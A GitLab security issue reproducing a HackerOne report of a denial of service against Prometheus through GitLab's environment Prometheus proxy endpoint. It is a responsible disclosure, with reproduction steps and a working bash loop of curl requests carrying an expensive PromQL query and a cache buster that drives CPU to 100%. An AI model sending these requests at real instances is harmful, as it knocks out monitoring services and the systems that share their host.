
DOS and high resource consumption of Prometheus server through abuse of Prometheus integration proxy endpoint

Please read the process on how to fix security issues before starting to work on the issue. Vulnerabilities must be fixed in a security mirror.

HackerOne report #1723124 by joaxcar on 2022-10-04, assigned to @truegreg:

Report | Attachments | How To Reproduce

Report

This report is similar to my other report https://hackerone.com/reports/1723106, but the two endpoints grafana/proxy and prometheus/proxy are different and execute similar but distinct code paths in the backend. They also have different use cases that might make the fixes differ. I am therefore reporting them separately, but feel free to connect them initially if that makes it easier.

Summary

I am no Prometheus expert, so the described scenario can probably be expanded and improved upon (from a DoS perspective). Still, I forced my Docker container with 16 cores to run at a constant 100% CPU with only 20 requests (the requests are asynchronous, meaning that the connection from the attacker to GitLab succeeds while the connection between GitLab and Prometheus persists). While the attack was running, I could not restart Prometheus from the terminal with gitlab-ctl stop prometheus as the service was unresponsive, and a gitlab-ctl restart did not fix it; I had to stop the Docker container to make it stop. The impact of the attack depends somewhat on the amount of data on the Prometheus server, but as I only tested this on my localhost GitLab Prometheus server, it is almost empty compared to real-life servers.

Prometheus feature

A user can configure a Prometheus integration and add custom queries that show up in the metrics panel of any environment.

See https://docs.gitlab.com/ee/user/project/integrations/prometheus.html for info on the integration

See https://docs.gitlab.com/ee/operations/metrics/ for environment metrics

A configured environment will get a Prometheus proxy at https://gitlab.example.com/group1/project1/-/environments/2/prometheus/api/v1/query_range

Custom metrics are configured by a maintainer of the project, but any user with ANY access to the project can run arbitrary queries against the query_range endpoint.
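For illustration, a proxied request might look like the one below. The environment ID and time window are example values taken from this report, and the PromQL expression in the query parameter is entirely attacker-chosen; "up" is just a harmless placeholder:

# Illustrative request through the project proxy endpoint.
# Any PromQL expression in "query" is forwarded to Prometheus as-is.
curl 'https://gitlab.example.com/group1/project1/-/environments/2/prometheus/api/v1/query_range?query=up&start_time=1654749435&end_time=1654771035&step=15'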

The setup

I booted up a GitLab Omnibus instance in a Docker container; this includes a Grafana instance (https://gitlab.example.com/-/grafana) and a Prometheus instance (http://localhost:9090). I also configured SSL and a DNS record (spoofed via the hosts file) for my server.

The Grafana instance already has the Prometheus instance as a datasource, so it's possible to use this instance for test purposes. I then configured the Grafana integration in a public project, following https://docs.gitlab.com/ee/operations/metrics/embed_grafana.html .

You might need to run the server for a while to get some data into Prometheus. After a fresh boot I used Burp to perform a scan against my localhost GitLab instance to fill up the server with HTTP requests; I did this twice with a spacing of 24 hours.
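Any sustained traffic will do here; the Burp scan is just one way to generate it. A low-tech alternative (purely illustrative) is to loop plain requests against the instance and repeat the batch a few times over a day:

# Generate traffic so Prometheus has samples to aggregate later.
for i in {1..500}
do
curl -sk -o /dev/null https://gitlab.example.com/
done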

The attack

As an unauthenticated user, I can now DoS the Prometheus server (and possibly also affect the overall system state of the Docker instance) by running this command in a terminal:

for index in {1..20}  
do  
curl 'https://gitlab.example.com/group1/project1/-/environments/2/prometheus/api/v1/query_range?query=min_over_time(api_requests_total%5B1000h%5D)%20%25%20max_over_time(http_requests_total%5B1000h%5D)%20%25%20histogram_quantile(0.9%2C%20sum%20by%20(job)%20(rate(http_requests_total%7Bjob%3D~%22.%2B%22%7D%5B100'$index'h%5D)))&start_time=1654749435&end_time=1654771035&step=15'  
done  

To get it working, you might need to modify start_time and end_time to something relevant (use date +%s in a terminal to get the current timestamp). If 20 requests are not enough, try increasing the number.
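For example, one way to pick a recent window (the six-hour length is an arbitrary choice) and print the values to plug into start_time and end_time:

# Compute a recent query window instead of hard-coding timestamps.
end_time=$(date +%s)
start_time=$((end_time - 6*3600))
echo "start_time=$start_time end_time=$end_time"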

In the Docker container, run htop or top to monitor the CPU.

Some details

Pulled apart, the anatomy of the request looks like this:

https://gitlab.example.com/group1/project1/-/environments/2/prometheus/api/v1/query_range <-- The project proxy endpoint

?query= <-- Start of query

<--  An expensive query, just a mess that I made up trying to eat resources  -->  
min_over_time(api_requests_total%5B1000h%5D)%20%25%20max_over_time(http_requests_total%5B1000h%5D)%20%25%20histogram_quantile(0.9%2C%20sum%20by%20(job)%20(rate(http_requests_total%7Bjob%3D~%22.%2B%22%7D%5B100

$index <-- Index used as cache buster

h%5D)))&start_time=1654749435&end_time=1654771035&step=15  

It is important to note that the query is arbitrary; I just tried to construct one heavy enough to tip over the server. It could probably be made far heavier. Also note the use of $index in the query: this is a "cache buster", needed because the GitLab backend will not run multiple queries against Prometheus if the query is identical.
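For readability, the URL-decoded form of the query above (with $index expanded to 1) is roughly:

min_over_time(api_requests_total[1000h]) % max_over_time(http_requests_total[1000h]) % histogram_quantile(0.9, sum by (job) (rate(http_requests_total{job=~".+"}[1001h])))

The $index value only varies the range selector at the end ([1001h], [1002h], ...), which is enough to make each request unique.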

Result

Here is a video showing the query running against my local server:

dos.mp4

Steps to reproduce

(If you have any other Prometheus instance you can test against, use that one. I will describe the attack with the Docker GitLab Omnibus image.)

  1. Boot up a Docker image of the latest GitLab Omnibus (see https://docs.gitlab.com/ee/install/docker.html)
  2. Log in as admin, go to http://gitlab.example.com/admin/application_settings/network and expand Outbound requests
  3. Enable requests from webhooks and services to localhost (this is needed to be able to use the built-in Prometheus instance)
  4. Create a new project on the GitLab instance
  5. Go to http://gitlab.example.com/GROUP/PROJECT/-/settings/integrations/prometheus/edit and enable the integration. Use the server http://localhost:9090
  6. Go to http://gitlab.example.com/GROUP/PROJECT/-/environments and create an environment
  7. Now make sure to load the Prometheus instance with some data. Make a bunch of requests to the GitLab instance over a period of time
  8. Open a terminal and get a shell in the Docker container, e.g.
docker exec -it gitlab /bin/bash  
  9. Run top to monitor the CPU load
  10. Now open another terminal and run
date +%s  
  11. Take the current timestamp and update start_time and end_time in this script
for index in {1..100}  
do  
curl 'https://gitlab.example.com/group1/project1/-/environments/1/prometheus/api/v1/query_range?query=min_over_time(api_requests_total%5B1000h%5D)%20%25%20max_over_time(http_requests_total%5B1000h%5D)%20%25%20histogram_quantile(0.9%2C%20sum%20by%20(job)%20(rate(http_requests_total%7Bjob%3D~%22.%2B%22%7D%5B100'$index'h%5D)))&start_time=1654749435&end_time=1654771035&step=15'  
done  
  12. Run it and watch the CPU in top. If there is enough data in the instance, all processors should spike to 100%
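As a quick check from inside the container, a one-off top snapshot shows whether the prometheus process is the one pinning the cores, and gitlab-ctl can be asked for the service status (assuming gitlab-ctl status takes a service name the same way gitlab-ctl stop does in the summary above):

# Snapshot of the busiest processes; prometheus should be near the top.
top -b -n 1 | head -n 20
# Check whether the Prometheus service still responds to its supervisor.
gitlab-ctl status prometheus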

Impact

DoS and high resource consumption on the Prometheus server

What is the current bug behavior?

No special permissions are required to run arbitrary queries against the Prometheus server, even though only maintainers are allowed to configure "custom queries".

There are two issues. First, any user with any access to the project can execute arbitrary queries (including unauthenticated users on public projects). Second, as the queries are arbitrary, they can be as complex as the attacker wants and can thus break the Prometheus server.

What is the expected correct behavior?

Queries should be restricted to the configured ones.

Output of checks

This bug happens on GitLab.com

Results of GitLab environment info
System information  
System:  
Proxy:          no  
Current User:   git  
Using RVM:      no  
Ruby Version:   2.7.5p203  
Gem Version:    3.1.6  
Bundler Version:2.3.15  
Rake Version:   13.0.6  
Redis Version:  6.2.7  
Sidekiq Version:6.4.2  
Go Version:     unknown

GitLab information  
Version:        15.4.0-ee  
Revision:       abbda55531f  
Directory:      /opt/gitlab/embedded/service/gitlab-rails  
DB Adapter:     PostgreSQL  
DB Version:     13.6  
URL:            http://gitlab2.joaxcar.com  
HTTP Clone URL: http://gitlab2.joaxcar.com/some-group/some-project.git  
SSH Clone URL:  git@gitlab2.joaxcar.com:some-group/some-project.git  
Elasticsearch:  no  
Geo:            no  
Using LDAP:     no  
Using Omniauth: yes  
Omniauth Providers:

GitLab Shell  
Version:        14.10.0  
Repository storage paths:  
- default:      /var/opt/gitlab/git-data/repositories  
GitLab Shell path:              /opt/gitlab/embedded/service/gitlab-shell  


Attachments

Warning: Attachments received through HackerOne, please exercise caution!

How To Reproduce

Please add reproducibility information to this section: